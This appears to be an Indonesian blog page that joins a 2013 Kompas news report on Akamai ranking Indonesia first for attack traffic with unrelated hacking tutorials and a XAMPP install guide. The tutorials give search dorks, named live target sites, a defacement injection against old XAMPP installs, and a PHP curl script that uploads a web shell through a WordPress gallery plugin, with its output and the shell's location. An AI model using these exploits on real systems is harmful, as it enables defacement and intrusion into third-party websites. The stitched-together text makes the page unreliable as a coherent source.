kIlustrasi.
KOMPAS.com — Serangan cyber yang berasal dari Indonesia terus mengalami peningkatan. Data terbaru dari Akamai mencatat, Indonesia saat ini menduduki peringkat pertama negara yang paling banyak melakukan serangan cyber.

Menurut laporan tiga bulanan bertajuk "State of the Internet" yang dirilis Akamai, Rabu (16/10/2013), Indonesia menyumbang 38 persen lalu lintas internet yang berhubungan dengan peretasan serverpada kuartal kedua 2013. Angka tersebut naik dari 21 persen pada kuartal pertama 2013.

Indonesia telah menyingkirkan China yang sebelumnya dikenal sebagai negara yang paling sering melakukan serangan cyber. Kini China berada di peringkat kedua, yang menyumbang 33 persen dari lalu lintas aksi peretasan global.

Sementara Amerika Serikat turun menjadi 6,9 persen dan tetap berada di peringkat ketiga. Dalam penelitian ini, Akamai mengamati lalu lintas serangan cyber di 175 negara berdasarkan alamat internet protokol (IP address).

Tidak diketahui secara pasti apakah serangan tersebut benar-benar berasal dari Indonesia. Sebab, peretas bisa saja memanfaatkan IP address dari Indonesia, padahal sebenarnya ia berada di luar Indonesia.

Tetapi, keberadaan peretas-peretas dari Indonesia pun tak boleh dipandang sebelah mata. Belakangan ini banyak kasus peretasan situs web pemerintah, termasuk situs web Presiden Susilo Bambang Yudhoyono yang dibobol Wildan Yani (22 tahun) asal Jember, Jawa Timur.

Menurut data Kementerian Komunikasi dan Informatika (Kemenkominfo), kasus serangan cyber di Indonesia telah mencapai 36,6 juta insiden dalam tiga tahun terakhir. Kemenkominfo telah berkomitmen untuk meningkatkan keamanan cyber nasional.

Pentingnya meningkatkan keamanan internet ini akan dibahas Pemerintah Indonesia dalam acara Internet Governance Forum 2013 yang digelar Perserikatan Bangsa-Bangsa di Nusa Dua, Bali, pada 22 sampai 25 Oktober 2013.
Bismillahirrahmanirrahiim,

sebelumnya saya mohon maaf, jika ada step yg kalian tidak mengerti, dikarenakan saya sedang males bikin tutorial :D
untuk dork :

intitle:"XAMPP Version 1.6.0"
intitle:"XAMPP Version 1.5."

Live Target :

http://moodle.wilmington.k12.oh.us/xampp/

buka website target, dan masukkan exploit berikut :

/xampp/lang.php?Hacked+By+Nicknamemu

nanti akan muncul sebuah pesan error, jika tidak ada pesan error itu artinya tidak vuln.

disini saya mendapatkan pesan error seperti ini :


lalu kita ganti "index.php" menjadi "lang.tmp"


selesai ^_^.
Bismillahirrahmanirrahim,

oke, pertama² kalian harus download dan install xampp ~> 
Tutorial & Link Download Xampp

yang kedua, kalian membutuhkan exploitnya :

<?php
$uploadfile="namashellkalian.php";
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>

 untuk Dork :

inurl:/wp-content/plugins/complete-gallery-manager/

live target :

http://primewebconsulting.com/
http://www.alpinegranite.com/

start xampp, dan klik Svc      [Apache] ~> Start ~> Admin


nanti akan muncul sebuah tab browser, jngn ditutup, buka tab browser tersebut, klik bahasa yang kalian inginkan.


klik start ~> Run ~> ketik "Cmd"
nanti akan muncul Command Prompt
ketik "cd \"
terus ketik "xampp/php"

oh iya, save file exploit & shell kalian di folder C:\Xampp\php\

setelah disave di folder php, kalian cari file php.ini :


buka file tersebut, lalu pencet ctrl+f dan ketik "curl" lalu klik Find Next. :


nanti akan muncul text seperti ini ";extension=php_curl.dll"

hapus tanda ";" disamping "extension=" lalu klik save.

disini saya anggap kalian sudah mengedit script exploitnya, sekarang kembali ke cmd dan ketik "php fileexploitnya.php" dan pencet enter.


nanti akan muncul text seperti ini :

{"success":true,"r_data":[{"name":"Full Size","url":"http:\/\/target
.com\/wp-content\/uploads\/2013\/10\/xeno-x.php","filename":"xeno","width":null,
"height":null}]}
C:\xampp\php>

bila tidak muncul text seperti itu, berarti website tersebut tidak vuln.

tempat shell yang terupload :

http://target.com/wp-content/uploads/2013/10/shell.php
Bismillahirrahmanirrahiim,

yang kalian butuhkan adalah installernya :
Xampp

setelah di download, ikuti cara dibawah ini :

1. bukan & langsung klik install.

2. ketik y dan tekan enter (jika sudah ada tekan enter saja).


3. Jika ada command seperti ini, ketik 1 dan pencet enter.

4. kemudian ketik "x" dan pencet enter.

nanti akan muncul sebuah Control Panel Xampp. dan selesai ^_^

Followers